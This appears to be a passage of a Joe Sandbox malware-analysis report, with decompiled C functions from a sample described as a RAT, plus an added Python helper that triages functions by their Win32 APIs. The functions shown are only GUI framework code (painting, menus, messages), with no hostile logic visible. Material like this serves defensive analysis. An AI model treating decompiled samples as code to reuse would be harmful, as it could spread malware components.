                                                    			}



















                                                    0x0044af00
                                                    0x0044af01
                                                    0x0044af0b
                                                    0x0044af0e
                                                    0x0044af11
                                                    0x0044af14
                                                    0x0044af16
                                                    0x0044af1b
                                                    0x0044af1c
                                                    0x0044af21
                                                    0x0044af24
                                                    0x0044af29
                                                    0x0044af2e
                                                    0x0044af32
                                                    0x0044af42
                                                    0x0044af51
                                                    0x0044af54
                                                    0x0044af59
                                                    0x0044af59
                                                    0x0044af59
                                                    0x0044af44
                                                    0x0044af47
                                                    0x0044af47
                                                    0x0044af5c
                                                    0x0044af5c
                                                    0x0044af68
                                                    0x0044af70
                                                    0x0044af96
                                                    0x0044af9e
                                                    0x0044afa3
                                                    0x0044afe1
                                                    0x0044afe6
                                                    0x0044afea
                                                    0x0044afef
                                                    0x0044affb
                                                    0x0044b003
                                                    0x0044b003
                                                    0x0044b008
                                                    0x0044b00c
                                                    0x0044b0a9
                                                    0x0044b0b1
                                                    0x0044b0ba
                                                    0x0044b0c9
                                                    0x0044b0ce
                                                    0x0044b0d0
                                                    0x0044b0d3
                                                    0x0044b0d6
                                                    0x0044b0e3
                                                    0x0044b012
                                                    0x0044b012
                                                    0x0044b016
                                                    0x0044b020
                                                    0x0044b030
                                                    0x0044b03d
                                                    0x0044b046
                                                    0x0044b055
                                                    0x0044b062
                                                    0x0044b062
                                                    0x0044b067
                                                    0x0044b06b
                                                    0x0044b099
                                                    0x0044b0a4
                                                    0x0044b06d
                                                    0x0044b072
                                                    0x0044b07e
                                                    0x0044b083
                                                    0x0044b085
                                                    0x00000000
                                                    0x00000000
                                                    0x0044b092
                                                    0x0044b092
                                                    0x00000000
                                                    0x0044b06b
                                                    0x0044b00c
                                                    0x0044afa8
                                                    0x0044afb6
                                                    0x0044afb7
                                                    0x0044afb8
                                                    0x0044afb9
                                                    0x0044afba
                                                    0x0044afcf
                                                    0x0044afcf
                                                    0x00000000
                                                    0x0044af72
                                                    0x0044af76
                                                    0x0044af89
                                                    0x0044af91
                                                    0x00000000
                                                    0x0044af91
                                                    0x0044af7e
                                                    0x00000000
                                                    0x00000000
                                                    0x0044af83
                                                    0x0044af87
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0044af87

                                                    APIs
                                                    • DrawEdge.USER32(00000000,?,00000006,00000002), ref: 0044AFCF
                                                    • OffsetRect.USER32(?,00000001,00000001), ref: 0044B020
                                                    • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0044B055
                                                    • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044B062
                                                    • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0044B0C9
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Draw$OffsetRectText$Edge
                                                    • String ID:
                                                    • API String ID: 3610532707-0
                                                    • Opcode ID: 18493c12ef401e963272a7311625c849f2c9f643628862a87cd9f04e99074c40
                                                    • Instruction ID: ea5abe3bfc9a9df89051e6d8e73c4225462b89b626b3e2b5561302bed16b813c
                                                    • Opcode Fuzzy Hash: 18493c12ef401e963272a7311625c849f2c9f643628862a87cd9f04e99074c40
                                                    • Instruction Fuzzy Hash: C551A3B0A04204AFEB10EBA9D881B9F73E5EF44324F55856BF924A7381C73CED048B59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 85%
                                                    			E0043F3B8(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                    				intOrPtr* _v8;
                                                    				intOrPtr _v12;
                                                    				int _v16;
                                                    				int _v20;
                                                    				struct tagPAINTSTRUCT _v84;
                                                    				intOrPtr _t55;
                                                    				void* _t64;
                                                    				struct HDC__* _t75;
                                                    				intOrPtr _t84;
                                                    				void* _t95;
                                                    				void* _t96;
                                                    				void* _t98;
                                                    				void* _t100;
                                                    				void* _t101;
                                                    				intOrPtr _t102;
                                                    
                                                    				_t100 = _t101;
                                                    				_t102 = _t101 + 0xffffffb0;
                                                    				_v12 = __edx;
                                                    				_v8 = __eax;
                                                    				_t75 =  *(_v12 + 4);
                                                    				if(_t75 == 0) {
                                                    					_t75 = BeginPaint(E00441704(_v8),  &_v84);
                                                    				}
                                                    				_push(_t100);
                                                    				_push(0x43f4d8);
                                                    				_push( *[fs:edx]);
                                                    				 *[fs:edx] = _t102;
                                                    				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
                                                    					_v20 = SaveDC(_t75);
                                                    					_v16 = 2;
                                                    					_t95 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
                                                    					if(_t95 >= 0) {
                                                    						_t96 = _t95 + 1;
                                                    						_t98 = 0;
                                                    						do {
                                                    							_t64 = E0041AC6C( *((intOrPtr*)(_v8 + 0x198)), _t98);
                                                    							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
                                                    								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
                                                    									goto L11;
                                                    								} else {
                                                    									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
                                                    									if(_v16 != 1) {
                                                    										goto L11;
                                                    									}
                                                    								}
                                                    							} else {
                                                    								goto L11;
                                                    							}
                                                    							goto L12;
                                                    							L11:
                                                    							_t98 = _t98 + 1;
                                                    							_t96 = _t96 - 1;
                                                    						} while (_t96 != 0);
                                                    					}
                                                    					L12:
                                                    					if(_v16 != 1) {
                                                    						 *((intOrPtr*)( *_v8 + 0xb8))();
                                                    					}
                                                    					RestoreDC(_t75, _v20);
                                                    				} else {
                                                    					 *((intOrPtr*)( *_v8 + 0xb8))();
                                                    				}
                                                    				E0043F510(_v8, 0, _t75);
                                                    				_pop(_t84);
                                                    				 *[fs:eax] = _t84;
                                                    				_push(0x43f4df);
                                                    				_t55 = _v12;
                                                    				if( *((intOrPtr*)(_t55 + 4)) == 0) {
                                                    					return EndPaint(E00441704(_v8),  &_v84);
                                                    				}
                                                    				return _t55;
                                                    			}


















                                                    0x0043f3b9
                                                    0x0043f3bb
                                                    0x0043f3c1
                                                    0x0043f3c4
                                                    0x0043f3ca
                                                    0x0043f3cf
                                                    0x0043f3e3
                                                    0x0043f3e3
                                                    0x0043f3e7
                                                    0x0043f3e8
                                                    0x0043f3ed
                                                    0x0043f3f0
                                                    0x0043f3fd
                                                    0x0043f417
                                                    0x0043f41a
                                                    0x0043f42d
                                                    0x0043f430
                                                    0x0043f432
                                                    0x0043f433
                                                    0x0043f435
                                                    0x0043f440
                                                    0x0043f449
                                                    0x0043f45b
                                                    0x00000000
                                                    0x0043f45d
                                                    0x0043f479
                                                    0x0043f480
                                                    0x00000000
                                                    0x00000000
                                                    0x0043f480
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0043f482
                                                    0x0043f482
                                                    0x0043f483
                                                    0x0043f483
                                                    0x0043f435
                                                    0x0043f486
                                                    0x0043f48a
                                                    0x0043f493
                                                    0x0043f493
                                                    0x0043f49e
                                                    0x0043f3ff
                                                    0x0043f406
                                                    0x0043f406
                                                    0x0043f4aa
                                                    0x0043f4b1
                                                    0x0043f4b4
                                                    0x0043f4b7
                                                    0x0043f4bc
                                                    0x0043f4c3
                                                    0x00000000
                                                    0x0043f4d2
                                                    0x0043f4d7

                                                    APIs
                                                    • BeginPaint.USER32(00000000,?), ref: 0043F3DE
                                                    • SaveDC.GDI32(?), ref: 0043F412
                                                    • ExcludeClipRect.GDI32(?,?,?,?,?,?), ref: 0043F474
                                                    • RestoreDC.GDI32(?,?), ref: 0043F49E
                                                    • EndPaint.USER32(00000000,?,0043F4DF), ref: 0043F4D2
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                    • String ID:
                                                    • API String ID: 3808407030-0
                                                    • Opcode ID: d4ea672e3d9b3f4c2e1dab9854368b7484ecc5b1cbb8fc2f2094f499677641b8
                                                    • Instruction ID: 9443a4bcddcea103c83dcf0c2b69b8a33cb36b1669e9c3c4d5886d405921b8f2
                                                    • Opcode Fuzzy Hash: d4ea672e3d9b3f4c2e1dab9854368b7484ecc5b1cbb8fc2f2094f499677641b8
                                                    • Instruction Fuzzy Hash: DA415070E00208AFC700DB99C984EAFB7F9AF58318F5490BAE90497362D739AE45CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
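
                                                     Every function block on this page (the two above and E0044AD40 below) has the same layout: the decompiled C body, an APIs list with call-site addresses, the memory dump the code was lifted from, and the opcode and instruction fuzzy hashes. With hundreds of such blocks in a full report, a small parser over that layout is how a practitioner separates framework code from the sample's own logic. The Python below is an added example written for this page, not code from the report or from Joe Sandbox. The class and function names, the GUI_ONLY heuristic and the interpretation of the .sdmp file-name fields are this example's own assumptions; the input excerpt is constructed from the lines on this page.

```python
"""Triage helper for the per-function blocks of a Joe Sandbox decompilation report.
Added example for this page (not code from the report or Joe Sandbox): it parses the
plain-text blocks shown here (C-Code header, decompiled body, APIs list, Memory Dump
Source), lists the Win32 APIs each function touches, flags functions that only do GUI
drawing (framework code, not the RAT's own logic) and decodes the dump's memory region."""
import re
from dataclasses import dataclass, field

# Documented Windows constants for MEMORY_BASIC_INFORMATION.Protect and .Type.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Heuristic (assumption): a function whose only imports are painting and menu APIs is
# framework code (the Delphi VCL in this sample) and low priority for manual review.
GUI_ONLY = {"DrawTextA", "DrawEdge", "OffsetRect", "BeginPaint", "EndPaint", "SaveDC",
            "RestoreDC", "ExcludeClipRect", "GetMenuItemCount", "GetMenuState",
            "RemoveMenu", "DestroyMenu"}

_API_RE = re.compile(r"•\s*(\w+)\.(\w+)\((.*?)\),\s*ref:\s*([0-9A-Fa-f]{8})")
_CALL_RE = re.compile(r"\b([A-Z][A-Za-z0-9]+)\(")       # any capitalised call in the C body
_NAME_RE = re.compile(r"^\s*(E[0-9A-F]{8})\(", re.M)   # decompiler's function name
_SRC_RE = re.compile(r"Source File:\s*(\S+\.sdmp),\s*Offset:\s*([0-9A-Fa-f]+)")
_META_RE = re.compile(r"^\s*(?:APIs|Memory Dump Source)\s*$", re.M)

@dataclass
class FunctionBlock:
    name: str
    apis: list = field(default_factory=list)      # (api, module, call-site address)
    code_calls: set = field(default_factory=set)  # Win32 calls visible in the C body
    dump_file: str = ""
    dump_offset: int = 0

    def missing_from_api_list(self) -> set:
        """Calls present in the decompiled body but absent from the report's APIs list."""
        return self.code_calls - {api for api, _, _ in self.apis}

    def triage(self) -> str:
        called = {api for api, _, _ in self.apis} | self.code_calls
        if not called:
            return "no-api"
        return "gui-only" if called <= GUI_ONLY else "review"

def parse_blocks(text: str) -> list:
    """Split the text at each 'C-Code - Quality' header and parse every block."""
    blocks = []
    for chunk in re.split(r"^\s*C-Code - Quality:.*$", text, flags=re.M):
        if not chunk.strip():
            continue
        m = _NAME_RE.search(chunk)
        fb = FunctionBlock(name=m.group(1) if m else "(unnamed)")
        fb.apis = [(api, mod, ref.upper()) for api, mod, _, ref in _API_RE.findall(chunk)]
        body = _META_RE.split(chunk, maxsplit=1)[0]      # C body only, not the APIs list
        fb.code_calls = {n for n in _CALL_RE.findall(body)
                         if not re.fullmatch(r"E[0-9A-F]{8}", n)}   # skip E-named subroutines
        src = _SRC_RE.search(chunk)
        if src:
            fb.dump_file, fb.dump_offset = src.group(1), int(src.group(2), 16)
        blocks.append(fb)
    return blocks

def decode_dump_name(name: str) -> dict:
    """Decode a .sdmp name. Field order (process index, dump index, id, region base, Protect,
    flag, Type, pad) is inferred from this report's values: an assumption, but the Protect
    and Type values map cleanly onto the documented constants."""
    f = name[:-len(".sdmp")].split(".")
    return {"process": int(f[0]), "dump": int(f[1]), "base": int(f[3], 16),
            "protect": PAGE_PROTECT.get(int(f[4], 16), f[4]),
            "type": MEM_TYPE.get(int(f[6], 16), f[6])}

# Constructed input: metadata lines of the three functions on this page, copied from the
# report text, plus the body lines of E0044AD40 that contain Win32 calls.
REPORT_EXCERPT = """\
APIs
• DrawEdge.USER32(00000000,?,00000006,00000002), ref: 0044AFCF
• OffsetRect.USER32(?,00000001,00000001), ref: 0044B020
• DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0044B055
• OffsetRect.USER32(?,000000FF,000000FF), ref: 0044B062
• DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0044B0C9
Memory Dump Source
• Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
C-Code - Quality: 85%
    E0043F3B8(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
APIs
• BeginPaint.USER32(00000000,?), ref: 0043F3DE
• SaveDC.GDI32(?), ref: 0043F412
• ExcludeClipRect.GDI32(?,?,?,?,?,?), ref: 0043F474
• RestoreDC.GDI32(?,?), ref: 0043F49E
• EndPaint.USER32(00000000,?,0043F4DF), ref: 0043F4D2
C-Code - Quality: 100%
    E0044AD40(int __eax, void* __edx) {
        _t18 = GetMenuItemCount(E0044AE70(__eax));
        _t18 = GetMenuState(E0044AE70(_t48), _t46, 0x400);
        _t18 = RemoveMenu(E0044AE70(_t48), _t46, 0x400);
        DestroyMenu( *(_t48 + 0x34));
"""

if __name__ == "__main__":
    for b in parse_blocks(REPORT_EXCERPT):
        print(b.name, b.triage(), sorted(b.missing_from_api_list()))
    print(decode_dump_name(parse_blocks(REPORT_EXCERPT)[0].dump_file))
```

                                                     Run against the excerpt, all three functions come out gui-only: DrawEdge/OffsetRect/DrawTextA in the first block, BeginPaint/SaveDC/ExcludeClipRect/RestoreDC/EndPaint in E0043F3B8, and GetMenuItemCount/GetMenuState/RemoveMenu/DestroyMenu in E0044AD40, which is consistent with compiled GUI-framework code rather than the RAT's own logic. Note that the E0044AD40 block on this page carries no APIs section at all even though its body calls four menu APIs, so missing_from_api_list() is the check to run before treating the APIs list as a complete import summary. The dump name decodes to process index 9, dump 2, a region at 0x401000 with PAGE_EXECUTE_READ and MEM_IMAGE: the executable section of the PE image mapped at 0x400000 (the stated Offset), which is where code lifted from a mapped image is expected to come from.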

                                                    C-Code - Quality: 100%
                                                    			E0044AD40(int __eax, void* __edx) {
                                                    				signed int _t39;
                                                    				signed int _t40;
                                                    				intOrPtr _t44;
                                                    				int _t46;
                                                    				int _t47;
                                                    				intOrPtr* _t48;
                                                    
                                                    				_t18 = __eax;
                                                    				_t48 = __eax;
                                                    				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
                                                    					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
                                                    						 *((char*)(__eax + 0x74)) = 1;
                                                    						return __eax;
                                                    					}
                                                    					_t19 =  *((intOrPtr*)(__eax + 0x6c));
                                                    					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
                                                    						return E0044AD40(_t19, __edx);
                                                    					}
                                                    					_t18 = GetMenuItemCount(E0044AE70(__eax));
                                                    					_t47 = _t18;
                                                    					_t40 = _t39 & 0xffffff00 | _t47 == 0x00000000;
                                                    					while(_t47 > 0) {
                                                    						_t46 = _t47 - 1;
                                                    						_t18 = GetMenuState(E0044AE70(_t48), _t46, 0x400);
                                                    						if((_t18 & 0x00000004) == 0) {
                                                    							_t18 = RemoveMenu(E0044AE70(_t48), _t46, 0x400);
                                                    							_t40 = 1;
                                                    						}
                                                    						_t47 = _t47 - 1;
                                                    					}
                                                    					if(_t40 != 0) {
                                                    						if( *((intOrPtr*)(_t48 + 0x64)) != 0) {
                                                    							L14:
                                                    							E0044AC00(_t48);
                                                    							L15:
                                                    							return  *((intOrPtr*)( *_t48 + 0x3c))();
                                                    						}
                                                    						_t44 =  *0x449854; // 0x4498a0
                                                    						if(E00403D78( *((intOrPtr*)(_t48 + 0x70)), _t44) == 0 || GetMenuItemCount(E0044AE70(_t48)) != 0) {
                                                    							goto L14;
                                                    						} else {
                                                    							DestroyMenu( *(_t48 + 0x34));
                                                    							 *(_t48 + 0x34) = 0;
                                                    							goto L15;
                                                    						}
                                                    					}
                                                    				}
                                                    				return _t18;
                                                    			}









                                                    0x0044ad40
                                                    0x0044ad44
                                                    0x0044ad4a
                                                    0x0044ad54
                                                    0x0044ad56
                                                    0x00000000
                                                    0x0044ad56
                                                    0x0044ad5f
                                                    0x0044ad64
                                                    0x00000000
                                                    0x0044ad66
                                                    0x0044ad78
                                                    0x0044ad7d
                                                    0x0044ad81
                                                    0x0044ad86
                                                    0x0044ad8f
                                                    0x0044ad99
                                                    0x0044ada0
                                                    0x0044adb0
                                                    0x0044adb5
                                                    0x0044adb5
                                                    0x0044adb7
                                                    0x0044adb8
                                                    0x0044adbe
                                                    0x0044adc4
                                                    0x0044adf9
                                                    0x0044adfb
                                                    0x0044ae00
                                                    0x00000000
                                                    0x0044ae06
                                                    0x0044adc9
                                                    0x0044add6
                                                    0x00000000
                                                    0x0044ade9
                                                    0x0044aded
                                                    0x0044adf4
                                                    0x00000000
                                                    0x0044adf4
                                                    0x0044add6
                                                    0x0044adbe
                                                    0x0044ae0d

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5343eef08e8d1dd02cbbfae1b5f1536b7b7bec594a8a1cd2160f538fd193b115
                                                    • Instruction ID: ccdcb766eb864ac881303502937fc5a84d080c6be124c079d60bb56e6bda1b55
                                                    • Opcode Fuzzy Hash: 5343eef08e8d1dd02cbbfae1b5f1536b7b7bec594a8a1cd2160f538fd193b115
                                                    • Instruction Fuzzy Hash: 7111D270EC521857FB60BEBA8806B5B378A5F41749F14042FBD119B782DA3CDC65829F
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0045A390(void* __eax, void* __ecx, struct HWND__** __edx) {
                                                    				intOrPtr _t11;
                                                    				intOrPtr _t20;
                                                    				void* _t30;
                                                    				void* _t31;
                                                    				void* _t33;
                                                    				struct HWND__** _t34;
                                                    				struct HWND__* _t35;
                                                    				struct HWND__* _t36;
                                                    
                                                    				_t31 = __ecx;
                                                    				_t34 = __edx;
                                                    				_t33 = __eax;
                                                    				_t30 = 0;
                                                    				_t11 =  *((intOrPtr*)(__edx + 4));
                                                    				if(_t11 < 0x100 || _t11 > 0x108) {
                                                    					L16:
                                                    					return _t30;
                                                    				} else {
                                                    					_t35 = GetCapture();
                                                    					if(_t35 != 0) {
                                                    						if(GetWindowLongA(_t35, 0xfffffffa) ==  *0x49e668 && SendMessageA(_t35, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
                                                    							_t30 = 1;
                                                    						}
                                                    						goto L16;
                                                    					}
                                                    					_t36 =  *_t34;
                                                    					_t2 = _t33 + 0x44; // 0x0
                                                    					_t20 =  *_t2;
                                                    					if(_t20 == 0 || _t36 !=  *((intOrPtr*)(_t20 + 0x254))) {
                                                    						L7:
                                                    						if(E00437E5C(_t36, _t31) == 0 && _t36 != 0) {
                                                    							_t36 = GetParent(_t36);
                                                    							goto L7;
                                                    						}
                                                    						if(_t36 == 0) {
                                                    							_t36 =  *_t34;
                                                    						}
                                                    						goto L11;
                                                    					} else {
                                                    						_t36 = E00441704(_t20);
                                                    						L11:
                                                    						if(SendMessageA(_t36, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
                                                    							_t30 = 1;
                                                    						}
                                                    						goto L16;
                                                    					}
                                                    				}
                                                    			}

                                                    0x0045a390
                                                    0x0045a394
                                                    0x0045a396
                                                    0x0045a398
                                                    0x0045a39a
                                                    0x0045a3a2
                                                    0x0045a441
                                                    0x0045a447
                                                    0x0045a3b3
                                                    0x0045a3b8
                                                    0x0045a3bc
                                                    0x0045a422
                                                    0x0045a43f
                                                    0x0045a43f
                                                    0x00000000
                                                    0x0045a422
                                                    0x0045a3be
                                                    0x0045a3c0
                                                    0x0045a3c0
                                                    0x0045a3c5
                                                    0x0045a3e0
                                                    0x0045a3e9
                                                    0x0045a3de
                                                    0x00000000
                                                    0x0045a3de
                                                    0x0045a3f1
                                                    0x0045a3f3
                                                    0x0045a3f3
                                                    0x00000000
                                                    0x0045a3cf
                                                    0x0045a3d4
                                                    0x0045a3f5
                                                    0x0045a40e
                                                    0x0045a410
                                                    0x0045a410
                                                    0x00000000
                                                    0x0045a40e
                                                    0x0045a3c5

                                                    APIs
                                                    • GetCapture.USER32 ref: 0045A3B3
                                                    • SendMessageA.USER32(00000000,-0000BBEE,0049ABD1,?), ref: 0045A407
                                                    • GetWindowLongA.USER32 ref: 0045A417
                                                    • SendMessageA.USER32(00000000,-0000BBEE,0049ABD1,?), ref: 0045A436
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessageSend$CaptureLongWindow
                                                    • String ID:
                                                    • API String ID: 1158686931-0
                                                    • Opcode ID: 5b89e33d5f33cfaebd5b1cc37b20e9e534ad05d39b8e2e3f38a1a5aac5179a0b
                                                    • Instruction ID: 3b7db6bc04ec6c9b9a315d118ec06550147a56b28b89c41b1f9545d3d98f8dbc
                                                    • Opcode Fuzzy Hash: 5b89e33d5f33cfaebd5b1cc37b20e9e534ad05d39b8e2e3f38a1a5aac5179a0b
                                                    • Instruction Fuzzy Hash: 491193712042095F9620FA9DC884F1373CC9B15319B10453AFD59C3343EAACFC54826B
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 22%
                                                    			E00442F0C(void* __eax) {
                                                    				intOrPtr _v8;
                                                    				intOrPtr _v12;
                                                    				char _v16;
                                                    				intOrPtr* _t14;
                                                    				intOrPtr* _t17;
                                                    				intOrPtr _t19;
                                                    				intOrPtr* _t21;
                                                    				intOrPtr* _t26;
                                                    				intOrPtr _t37;
                                                    				void* _t39;
                                                    				intOrPtr _t47;
                                                    				void* _t49;
                                                    				void* _t51;
                                                    				intOrPtr _t52;
                                                    
                                                    				_t49 = _t51;
                                                    				_t52 = _t51 + 0xfffffff4;
                                                    				_t39 = __eax;
                                                    				if( *((short*)(__eax + 0x68)) == 0xffff) {
                                                    					return __eax;
                                                    				} else {
                                                    					_t14 =  *0x49d970; // 0x49e900
                                                    					_t17 =  *0x49d970; // 0x49e900
                                                    					_t19 =  *((intOrPtr*)( *_t17))(0xd,  *((intOrPtr*)( *_t14))(0xe, 1, 1, 1));
                                                    					_push(_t19);
                                                    					L0042C408();
                                                    					_v8 = _t19;
                                                    					_push(_t49);
                                                    					_push(0x442fcc);
                                                    					_push( *[fs:eax]);
                                                    					 *[fs:eax] = _t52;
                                                    					_t21 =  *0x49de0c; // 0x49ebbc
                                                    					E0042C440(_v8, E004586EC( *_t21,  *((short*)(__eax + 0x68))));
                                                    					_t26 =  *0x49de0c; // 0x49ebbc
                                                    					E0042C440(_v8, E004586EC( *_t26,  *((short*)(_t39 + 0x68))));
                                                    					_push(0);
                                                    					_push(0);
                                                    					_push(0);
                                                    					_push(_v8);
                                                    					L0042C48C();
                                                    					_push( &_v16);
                                                    					_push(0);
                                                    					L0042C49C();
                                                    					_push(_v12);
                                                    					_push(_v16);
                                                    					_push(1);
                                                    					_push(_v8);
                                                    					L0042C48C();
                                                    					_pop(_t47);
                                                    					 *[fs:eax] = _t47;
                                                    					_push(0x442fd3);
                                                    					_t37 = _v8;
                                                    					_push(_t37);
                                                    					L0042C410();
                                                    					return _t37;
                                                    				}
                                                    			}

                                                    0x00442f0d
                                                    0x00442f0f
                                                    0x00442f13
                                                    0x00442f1a
                                                    0x00442fd7
                                                    0x00442f20
                                                    0x00442f28
                                                    0x00442f34
                                                    0x00442f3b
                                                    0x00442f3d
                                                    0x00442f3e
                                                    0x00442f43
                                                    0x00442f48
                                                    0x00442f49
                                                    0x00442f4e
                                                    0x00442f51
                                                    0x00442f58
                                                    0x00442f69
                                                    0x00442f72
                                                    0x00442f83
                                                    0x00442f88
                                                    0x00442f8a
                                                    0x00442f8c
                                                    0x00442f91
                                                    0x00442f92
                                                    0x00442f9a
                                                    0x00442f9b
                                                    0x00442f9d
                                                    0x00442fa5
                                                    0x00442fa9
                                                    0x00442faa
                                                    0x00442faf
                                                    0x00442fb0
                                                    0x00442fb7
                                                    0x00442fba
                                                    0x00442fbd
                                                    0x00442fc2
                                                    0x00442fc5
                                                    0x00442fc6
                                                    0x00442fcb
                                                    0x00442fcb

                                                    APIs
                                                    • 739F1AB0.COMCTL32(00000000), ref: 00442F3E
                                                      • Part of subcall function 0042C440: 739F2140.COMCTL32(00439016,000000FF,00000000,00442F6E,00000000,00442FCC,?,00000000), ref: 0042C444
                                                    • 739F1680.COMCTL32(00439016,00000000,00000000,00000000,00000000,00442FCC,?,00000000), ref: 00442F92
                                                    • 739F1710.COMCTL32(00000000,?,00439016,00000000,00000000,00000000,00000000,00442FCC,?,00000000), ref: 00442F9D
                                                    • 739F1680.COMCTL32(00439016,00000001,?,00443035,00000000,?,00439016,00000000,00000000,00000000,00000000,00442FCC,?,00000000), ref: 00442FB0
                                                    • 739F1F60.COMCTL32(00439016,00442FD3,00443035,00000000,?,00439016,00000000,00000000,00000000,00000000,00442FCC,?,00000000), ref: 00442FC6
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: F1680$F1710F2140
                                                    • String ID:
                                                    • API String ID: 3528053765-0
                                                    • Opcode ID: dd8f6c6bef30573f89024d1b65c38e83719737ac9faca5af5380f6cb668c253e
                                                    • Instruction ID: 31acb13db4a7b61839ae31ff436912f2200b31873635aba84f9d8170318329f8
                                                    • Opcode Fuzzy Hash: dd8f6c6bef30573f89024d1b65c38e83719737ac9faca5af5380f6cb668c253e
                                                    • Instruction Fuzzy Hash: 8B216F74B04204AFEB10EBA9DCD2F6E73F8EB48704F900066F904DB291DAB9AD40C758
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 86%
                                                    			E00472C58(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                    				intOrPtr* _v8;
                                                    				char _v408;
                                                    				char _v412;
                                                    				char _v416;
                                                    				int _t30;
                                                    				char* _t38;
                                                    				signed int _t39;
                                                    				intOrPtr _t48;
                                                    				intOrPtr* _t53;
                                                    				intOrPtr _t55;
                                                    				void* _t56;
                                                    				void* _t58;
                                                    
                                                    				_v416 = 0;
                                                    				_v412 = 0;
                                                    				 *[fs:eax] = _t58 + 0xfffffe64;
                                                    				_t38 = E00408D24(0x104, __eflags);
                                                    				L00472BD0();
                                                    				_v8 = E00403BBC(1);
